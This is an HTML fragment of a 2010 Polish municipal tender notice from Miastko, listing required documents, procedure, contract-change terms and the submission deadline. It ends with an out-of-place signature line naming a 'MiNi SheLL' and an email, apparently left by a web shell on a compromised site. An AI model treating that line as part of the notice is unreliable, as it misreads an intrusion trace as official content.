<li style="margin-bottom: 12px;">wykonawca powołujący się przy wykazywaniu spełniania warunków udziału w postępowaniu na potencjał innych podmiotów, które będą brały udział w realizacji części zamówienia, przedkłada także dokumenty dotyczące tego podmiotu w zakresie wymaganym dla wykonawcy, określonym w pkt III.4.2.</li>

</ul></li>
<li>
<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
</ul>
<p class="bold">III.6) INNE DOKUMENTY</p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>1)	Dowód wniesienia wadium: 
a) jeżeli wniesiono w pieniądzu - do oferty zaleca się dołączyć dowód zrealizowania przelewu w formie oryginału lub kserokopii poświadczonej za zgodność z oryginałem przez Wykonawcę; 
b) jeżeli wniesiono w innej dopuszczalnej formie - do oferty należy dołączyć oryginał właściwego dokumentu 
2)	Pełnomocnictwo osób/y uprawnionej do reprezentowania firmy, zgodnie z formą reprezentacji Wykonawcy określoną w rejestrze handlowym lub w innym dokumencie, właściwym dla formy organizacyjnej firmy Wykonawcy o ile nie wynika to z innych dokumentów załączonych do oferty; 
3)	Dokument, w którym wykonawcy wspólnie ubiegający się o udzielenie zamówienia (np. na podstawie umowy konsorcjalnej, działalności prowadzonej w formie spółki cywilnej) ustanawiają pełnomocnika do reprezentowania ich w postępowaniu o udzielenie zamówienia albo reprezentowania w postępowaniu i zawarcia umowy w sprawie zamówienia publicznego, z którego wynika, że zostało ono udzielone przez każdego z Nich (podpisany przez wszystkich wykonawców) - w formie oryginału, w przypadku wyboru oferty tych Wykonawców, Zamawiający przed zawarciem umowy ws. zamówienia publicznego będzie żądał umowę regulującą ich współpracę; 
4)	Wskazanie części zamówienia, której wykonanie Wykonawca zamierza powierzyć Podwykonawcom - należy zamieścić na formularzu ofertowym;
5)	Dokumenty sporządzone w języku obcym należy złożyć wraz z tłumaczeniem na język polski</p>
<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>tak</p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>Zamawiający dopuszcza następujące możliwości zmiany postanowień umowy w stosunku do treści oferty:
1)	zmiany osób sprawujących czynności  i wskazanych w ofercie na uzasadniony wniosek wykonawcy zaakceptowany przez Zamawiającego lub na żądanie Zamawiającego jeżeli nie wywiązują się one z nałożonych obowiązków;
2)	 przedłużenia terminu wykonania umowy o czas opóźnienia, jeżeli takie opóźnienie będzie miało wpływ na wykonanie przedmiotu umowy i uwarunkowane jest:
a)	wstrzymaniem robót przez Zamawiającego w okolicznościach, za które nie ponosi Wykonawca żadnej odpowiedzialności;
b)	na przedłużenie terminu realizacji projektu z przyczyn obecnie niemożliwych do określenia,
c)	wykopaliskami uniemożliwiającymi wykonywanie robót;
d)	szczególnie niesprzyjającymi warunkami atmosferycznymi;
e)	koniecznością dokonania istotnych zmian  w dokumentacji projektowej na wniosek stron;
f)	wystąpieniem siły wyższej;</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.bip.miastko.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> SIWZ dostępna jest w siedzibie Zamawiającego (pokój 43). Płatność w kwocie 10,00 PLN (brutto) za SIWZ wyłącznie za przekazanie (przesłanie) jej w formie papierowej na wniosek Wykonawcy..</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 29.04.2010 godzina 12:00, miejsce: Urząd Miejski w Miastku, 77-200 Miastko, ul. Grunwaldzka 1 pok. nr 19 (sekretariat burmistrza)..</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com